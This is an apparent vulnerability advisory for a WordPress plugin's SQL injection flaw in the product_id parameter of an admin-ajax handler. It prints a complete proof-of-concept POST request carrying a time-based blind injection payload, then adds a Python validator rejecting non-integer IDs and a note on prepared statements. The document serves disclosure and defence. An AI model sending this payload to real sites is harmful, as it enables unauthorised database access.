The fetch_product_ajax functionality in the plugin uses a `product_id` POST parameter that is not properly sanitised, escaped or validated before being inserted into a SQL statement, leading to SQL injection.
```
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Length: 162
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-GPC: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [admin+]
Connection: close

keyword=eewr&searchfilters=sku&security=c3b54163aa&action=cpf_cart_product&feedpath=core%2Fajax%2Fwp%2Ffetch_product_ajax.php&q=savep&local_cat_ids=1&product_id=1%20AND%20(SELECT%207403%20FROM%20(SELECT(SLEEP(5)))gJUc)
```
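A defensive check for the flaw described above, added here as an example and not taken from the plugin or the advisory: it parses a form-encoded admin-ajax body and rejects any `product_id` that is not a plain integer, which is the validation the handler lacks. The function name, the 20-digit limit and the benign sample body are assumptions; the first sample body is the one from the request above.

```python
import re
from urllib.parse import parse_qs

# The AJAX action seen in the request above; other actions are out of scope.
WATCHED_ACTION = "cpf_cart_product"
# Assumption: a product ID is a plain decimal integer of at most 20 digits.
STRICT_INT = re.compile(r"[0-9]{1,20}")

# Body taken from the request shown on this page.
PAGE_BODY = (
    "keyword=eewr&searchfilters=sku&security=c3b54163aa&action=cpf_cart_product"
    "&feedpath=core%2Fajax%2Fwp%2Ffetch_product_ajax.php&q=savep&local_cat_ids=1"
    "&product_id=1%20AND%20(SELECT%207403%20FROM%20(SELECT(SLEEP(5)))gJUc)"
)
# Constructed benign body for comparison (not from the page).
BENIGN_BODY = "keyword=shirt&action=cpf_cart_product&q=savep&product_id=42"


def check_product_id(body: str) -> list:
    """Return the reasons a form-encoded admin-ajax body should be rejected."""
    # parse_qs percent-decodes values, so encoded spaces and quotes are
    # inspected in the form the server-side code would see them.
    params = parse_qs(body, keep_blank_values=True)
    if WATCHED_ACTION not in params.get("action", []):
        return []  # not the handler this rule covers
    values = params.get("product_id", [])
    if not values:
        return ["product_id missing"]
    reasons = []
    if len(values) > 1:
        # Duplicate keys can make a filter and the application disagree
        # about which value is used.
        reasons.append("product_id repeated")
    for value in values:
        # fullmatch rejects trailing SQL, whitespace and newlines.
        if not STRICT_INT.fullmatch(value):
            reasons.append(f"product_id is not an integer: {value!r}")
    return reasons


if __name__ == "__main__":
    for name, body in (("page", PAGE_BODY), ("benign", BENIGN_BODY)):
        print(name, check_product_id(body) or "ok")
```

A check like this only filters input at the edge; inside the plugin the value still needs to be cast to an integer or bound as a parameter in a prepared statement.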
Syed Sheeraz Ali of Codevigilant
Yes
2021-08-22 (about 1 year ago)
2021-08-23 (about 1 year ago)
2022-04-09 (about 1 year ago)